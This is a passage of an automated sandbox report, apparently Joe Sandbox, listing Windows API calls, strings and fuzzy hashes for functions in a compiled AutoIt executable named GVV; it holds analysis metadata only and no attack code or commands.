                • SelectObject.GDI32(?,?), ref: 001A75D0
                • DeleteObject.GDI32(?), ref: 001A75D5
                • SetTextColor.GDI32(?,?), ref: 001A75DB
                • SetBkColor.GDI32(?,?), ref: 001A75E5
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                • String ID:
                • API String ID: 1996641542-0
                • Opcode ID: 3dc5dbc678e8cb1695014a3b59b30e3441de5976f36edb38627b1c3e6cb2ee74
                • Instruction ID: b5b845e8c2f5b64827b6910d0e03bbecd40caaae1aa9366195c82b656863ce3e
                • Opcode Fuzzy Hash: 3dc5dbc678e8cb1695014a3b59b30e3441de5976f36edb38627b1c3e6cb2ee74
                • Instruction Fuzzy Hash: 6D614F76D04218AFDF019FA4DC49AEE7FB9EB0A320F114125F915AB2E1D7749A80CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCursorPos.USER32(?), ref: 001A1128
                • GetDesktopWindow.USER32 ref: 001A113D
                • GetWindowRect.USER32(00000000), ref: 001A1144
                • GetWindowLongW.USER32(?,000000F0), ref: 001A1199
                • DestroyWindow.USER32(?), ref: 001A11B9
                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001A11ED
                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001A120B
                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001A121D
                • SendMessageW.USER32(00000000,00000421,?,?), ref: 001A1232
                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001A1245
                • IsWindowVisible.USER32(00000000), ref: 001A12A1
                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001A12BC
                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001A12D0
                • GetWindowRect.USER32(00000000,?), ref: 001A12E8
                • MonitorFromPoint.USER32(?,?,00000002), ref: 001A130E
                • GetMonitorInfoW.USER32(00000000,?), ref: 001A1328
                • CopyRect.USER32(?,?), ref: 001A133F
                • SendMessageW.USER32(00000000,00000412,00000000), ref: 001A13AA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                • String ID: ($0$tooltips_class32
                • API String ID: 698492251-4156429822
                • Opcode ID: fe97211e21dfd9701789420ffeb0131c8d2d3d44dcb49d7bb93f3d161d6c2aa3
                • Instruction ID: 50327d96779d61c85131bc100b027c8b56b637c47ef1161dc80804d18c71443b
                • Opcode Fuzzy Hash: fe97211e21dfd9701789420ffeb0131c8d2d3d44dcb49d7bb93f3d161d6c2aa3
                • Instruction Fuzzy Hash: BDB19D75608341AFDB04DF64C984BABBBE5FF89350F00891DF9999B2A1D731E884CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharUpperBuffW.USER32(?,?), ref: 001A02E5
                • _wcslen.LIBCMT ref: 001A031F
                • _wcslen.LIBCMT ref: 001A0389
                • _wcslen.LIBCMT ref: 001A03F1
                • _wcslen.LIBCMT ref: 001A0475
                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001A04C5
                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001A0504
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                  • Part of subcall function 0017223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00172258
                  • Part of subcall function 0017223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0017228A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                • API String ID: 1103490817-719923060
                • Opcode ID: 58329e88f3c907a76e4a6c7cd70d223e8c67d59759636a8b4370c29bbb55d787
                • Instruction ID: 4acba31ebd023780c4cc1d396365374d029db992bafddbda1d6514e154e41736
                • Opcode Fuzzy Hash: 58329e88f3c907a76e4a6c7cd70d223e8c67d59759636a8b4370c29bbb55d787
                • Instruction Fuzzy Hash: 65E1B3352083018FCB19DF24C55096AB7E6BF9D318F54496DF8969B3A1DB30ED86CB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00128968
                • GetSystemMetrics.USER32(00000007), ref: 00128970
                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0012899B
                • GetSystemMetrics.USER32(00000008), ref: 001289A3
                • GetSystemMetrics.USER32(00000004), ref: 001289C8
                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001289E5
                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001289F5
                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00128A28
                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00128A3C
                • GetClientRect.USER32(00000000,000000FF), ref: 00128A5A
                • GetStockObject.GDI32(00000011), ref: 00128A76
                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00128A81
                  • Part of subcall function 0012912D: GetCursorPos.USER32(?), ref: 00129141
                  • Part of subcall function 0012912D: ScreenToClient.USER32(00000000,?), ref: 0012915E
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000001), ref: 00129183
                  • Part of subcall function 0012912D: GetAsyncKeyState.USER32(00000002), ref: 0012919D
                • SetTimer.USER32(00000000,00000000,00000028,001290FC), ref: 00128AA8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                • String ID: AutoIt v3 GUI
                • API String ID: 1458621304-248962490
                • Opcode ID: eb53ae6da7a2307a9e40135d5a623470ae52853f4d0a24d726b04a1b61c6030e
                • Instruction ID: 9bb24ba6ee48078e863b3bbdb4b394b1fef5ff3982307ee44b0a809147c82ac4
                • Opcode Fuzzy Hash: eb53ae6da7a2307a9e40135d5a623470ae52853f4d0a24d726b04a1b61c6030e
                • Instruction Fuzzy Hash: C0B18E75A00219AFDF14DFA8DD85BAE7BB5FB48314F114129FA15AB290DB34E890CB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00171114
                  • Part of subcall function 001710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171120
                  • Part of subcall function 001710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 0017112F
                  • Part of subcall function 001710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00170B9B,?,?,?), ref: 00171136
                  • Part of subcall function 001710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0017114D
                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00170DF5
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00170E29
                • GetLengthSid.ADVAPI32(?), ref: 00170E40
                • GetAce.ADVAPI32(?,00000000,?), ref: 00170E7A
                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00170E96
                • GetLengthSid.ADVAPI32(?), ref: 00170EAD
                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00170EB5
                • HeapAlloc.KERNEL32(00000000), ref: 00170EBC
                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00170EDD
                • CopySid.ADVAPI32(00000000), ref: 00170EE4
                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00170F13
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00170F35
                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00170F47
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F6E
                • HeapFree.KERNEL32(00000000), ref: 00170F75
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F7E
                • HeapFree.KERNEL32(00000000), ref: 00170F85
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00170F8E
                • HeapFree.KERNEL32(00000000), ref: 00170F95
                • GetProcessHeap.KERNEL32(00000000,?), ref: 00170FA1
                • HeapFree.KERNEL32(00000000), ref: 00170FA8
                  • Part of subcall function 00171193: GetProcessHeap.KERNEL32(00000008,00170BB1,?,00000000,?,00170BB1,?), ref: 001711A1
                  • Part of subcall function 00171193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00170BB1,?), ref: 001711A8
                  • Part of subcall function 00171193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00170BB1,?), ref: 001711B7
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                • String ID:
                • API String ID: 4175595110-0
                • Opcode ID: 072cdd64f55bd3ab3beabb6f904de7e23bb0121de622da403df3a564fe2631b0
                • Instruction ID: 08623bc3e4eb80fcba04d4420ad9898817f48e4d9f4ca2726bfcaf90a4eae3e1
                • Opcode Fuzzy Hash: 072cdd64f55bd3ab3beabb6f904de7e23bb0121de622da403df3a564fe2631b0
                • Instruction Fuzzy Hash: 78713B72A0030AEBDF21DFA4DC45FAEBBB8BF09310F148115F919E6191DB719A45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0019C4BD
                • RegCreateKeyExW.ADVAPI32(?,?,00000000,001ACC08,00000000,?,00000000,?,?), ref: 0019C544
                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0019C5A4
                • _wcslen.LIBCMT ref: 0019C5F4
                • _wcslen.LIBCMT ref: 0019C66F
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0019C6B2
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0019C7C1
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0019C84D
                • RegCloseKey.ADVAPI32(?), ref: 0019C881
                • RegCloseKey.ADVAPI32(00000000), ref: 0019C88E
                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0019C960
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                • API String ID: 9721498-966354055
                • Opcode ID: a5bae9eb5c85a215f7ade04282c3c0e629cbb3129ea698fe6efa166f01b09458
                • Instruction ID: 466b921059310b2f281c4a031f484545ff7beaab43bdda145f18381a4c8c1b6d
                • Opcode Fuzzy Hash: a5bae9eb5c85a215f7ade04282c3c0e629cbb3129ea698fe6efa166f01b09458
                • Instruction Fuzzy Hash: 6B1269356042019FDB18DF14D891A6AB7E5FF88714F05886DF89A9B3A2DB31FD81CB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharUpperBuffW.USER32(?,?), ref: 001A09C6
                • _wcslen.LIBCMT ref: 001A0A01
                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A0A54
                • _wcslen.LIBCMT ref: 001A0A8A
                • _wcslen.LIBCMT ref: 001A0B06
                • _wcslen.LIBCMT ref: 001A0B81
                  • Part of subcall function 0012F9F2: _wcslen.LIBCMT ref: 0012F9FD
                  • Part of subcall function 00172BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00172BFA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$MessageSend$BuffCharUpper
                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                • API String ID: 1103490817-4258414348
                • Opcode ID: 343667f9421a7defbc894f685f2d6c24b2c5c8710dd4873171b91b1425532640
                • Instruction ID: 4c255894d335385a19d34bcf906079075f3ec8a24979fb73a829bd217345872d
                • Opcode Fuzzy Hash: 343667f9421a7defbc894f685f2d6c24b2c5c8710dd4873171b91b1425532640
                • Instruction Fuzzy Hash: B5E1B1392083018FC719DF24C55096AB7F2BFA9314F15896DF89A9B3A2D731ED85CB81
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: _wcslen$BuffCharUpper
                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                • API String ID: 1256254125-909552448
                • Opcode ID: a05e3ea6c4dcdd00468db9dc7be9d559902d4dcc79babb3f76c459b097295f72
                • Instruction ID: f161fb04efa51243d1612094e897f49ded6b328e815e4c7db0524241adb6205a
                • Opcode Fuzzy Hash: a05e3ea6c4dcdd00468db9dc7be9d559902d4dcc79babb3f76c459b097295f72
                • Instruction Fuzzy Hash: A471D33260016A8BCF20DE7CC9515BE3391ABB57A4F550529F8A6AB284F735DD85C3E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _wcslen.LIBCMT ref: 001A835A
                • _wcslen.LIBCMT ref: 001A836E
                • _wcslen.LIBCMT ref: 001A8391
                • _wcslen.LIBCMT ref: 001A83B4
                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001A83F2
                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001A5BF2), ref: 001A844E
                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001A8487
                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001A84CA
                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001A8501
                • FreeLibrary.KERNEL32(?), ref: 001A850D
                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001A851D
                • DestroyIcon.USER32(?,?,?,?,?,001A5BF2), ref: 001A852C
                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001A8549
                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001A8555
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                • String ID: .dll$.exe$.icl
                • API String ID: 799131459-1154884017
                • Opcode ID: c2c79e17e341efbfd633b3cf05feabcee28d4fb99393c1146dd3137fbb7cf4bd
                • Instruction ID: a98ee35bcd8e1783fa477f3d260230bb0ae1a6f0ab3feb107bd38ce6bede745f
                • Opcode Fuzzy Hash: c2c79e17e341efbfd633b3cf05feabcee28d4fb99393c1146dd3137fbb7cf4bd
                • Instruction Fuzzy Hash: 7861CF71A40215BFEB14DF64CC85BFE77A8BF19B21F10460AF815D61D1EB74AA90CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID:
                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                • API String ID: 0-1645009161
                • Opcode ID: 1539c83c62d830f58db1abd150289552a909ba114fd54333fc54f5f81d9e3bba
                • Instruction ID: 2ddedd993c7aff650c0483aecc5cfe4d8c9687df24302f3282cbcf4cc4a3f555
                • Opcode Fuzzy Hash: 1539c83c62d830f58db1abd150289552a909ba114fd54333fc54f5f81d9e3bba
                • Instruction Fuzzy Hash: 02810671604605BBDB28AF60DC56FEE3BB9AF25300F044034FC15AA2D6EB70D996C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CharLowerBuffW.USER32(?,?), ref: 00183EF8
                • _wcslen.LIBCMT ref: 00183F03
                • _wcslen.LIBCMT ref: 00183F5A
                • _wcslen.LIBCMT ref: 00183F98
                • GetDriveTypeW.KERNEL32(?), ref: 00183FD6
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018401E
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00184059
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00184087
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: SendString_wcslen$BuffCharDriveLowerType
                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                • API String ID: 1839972693-4113822522
                • Opcode ID: cdc66b5d2209af9f84f49fa6c325d423d87eb90b87b883ee19805bbeaabfd106
                • Instruction ID: 0472b75637d1a9f5270002f887426bbd2ec631f16e9dbee5306cf2634cf764bd
                • Opcode Fuzzy Hash: cdc66b5d2209af9f84f49fa6c325d423d87eb90b87b883ee19805bbeaabfd106
                • Instruction Fuzzy Hash: 1071E5326042129FC314EF24C8809ABB7F4FFA4764F04492DF9A597251EB31EE85CB92
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadIconW.USER32(00000063), ref: 00175A2E
                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00175A40
                • SetWindowTextW.USER32(?,?), ref: 00175A57
                • GetDlgItem.USER32(?,000003EA), ref: 00175A6C
                • SetWindowTextW.USER32(00000000,?), ref: 00175A72
                • GetDlgItem.USER32(?,000003E9), ref: 00175A82
                • SetWindowTextW.USER32(00000000,?), ref: 00175A88
                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00175AA9
                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00175AC3
                • GetWindowRect.USER32(?,?), ref: 00175ACC
                • _wcslen.LIBCMT ref: 00175B33
                • SetWindowTextW.USER32(?,?), ref: 00175B6F
                • GetDesktopWindow.USER32 ref: 00175B75
                • GetWindowRect.USER32(00000000), ref: 00175B7C
                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00175BD3
                • GetClientRect.USER32(?,?), ref: 00175BE0
                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00175C05
                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00175C2F
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                • String ID:
                • API String ID: 895679908-0
                • Opcode ID: 5ab11a3fe97f3efc72f745c97f6a3aa69f49ca89d132734df563ed01259412d9
                • Instruction ID: e09eb13ae6e1f1bcd8a3b1ecdedafb842dd55f9a405404b9095cdfab69aeafc0
                • Opcode Fuzzy Hash: 5ab11a3fe97f3efc72f745c97f6a3aa69f49ca89d132734df563ed01259412d9
                • Instruction Fuzzy Hash: 8A715231900B05AFDB20DFA8CE45B6EBBF6FF48715F104518E54AA3590D7B5E944CB50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 0018FE27
                • LoadCursorW.USER32(00000000,00007F8A), ref: 0018FE32
                • LoadCursorW.USER32(00000000,00007F00), ref: 0018FE3D
                • LoadCursorW.USER32(00000000,00007F03), ref: 0018FE48
                • LoadCursorW.USER32(00000000,00007F8B), ref: 0018FE53
                • LoadCursorW.USER32(00000000,00007F01), ref: 0018FE5E
                • LoadCursorW.USER32(00000000,00007F81), ref: 0018FE69
                • LoadCursorW.USER32(00000000,00007F88), ref: 0018FE74
                • LoadCursorW.USER32(00000000,00007F80), ref: 0018FE7F
                • LoadCursorW.USER32(00000000,00007F86), ref: 0018FE8A
                • LoadCursorW.USER32(00000000,00007F83), ref: 0018FE95
                • LoadCursorW.USER32(00000000,00007F85), ref: 0018FEA0
                • LoadCursorW.USER32(00000000,00007F82), ref: 0018FEAB
                • LoadCursorW.USER32(00000000,00007F84), ref: 0018FEB6
                • LoadCursorW.USER32(00000000,00007F04), ref: 0018FEC1
                • LoadCursorW.USER32(00000000,00007F02), ref: 0018FECC
                • GetCursorInfo.USER32(?), ref: 0018FEDC
                • GetLastError.KERNEL32 ref: 0018FF1E
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: Cursor$Load$ErrorInfoLast
                • String ID:
                • API String ID: 3215588206-0
                • Opcode ID: 999ccb1e1a3cb1e36b882da5eb6abf0c1a21fcc0d83b600789d262d0017aa76d
                • Instruction ID: 59c4be4fd9390a202f79357dc031c35964daa9d9892f9c8a9a837318f88deebd
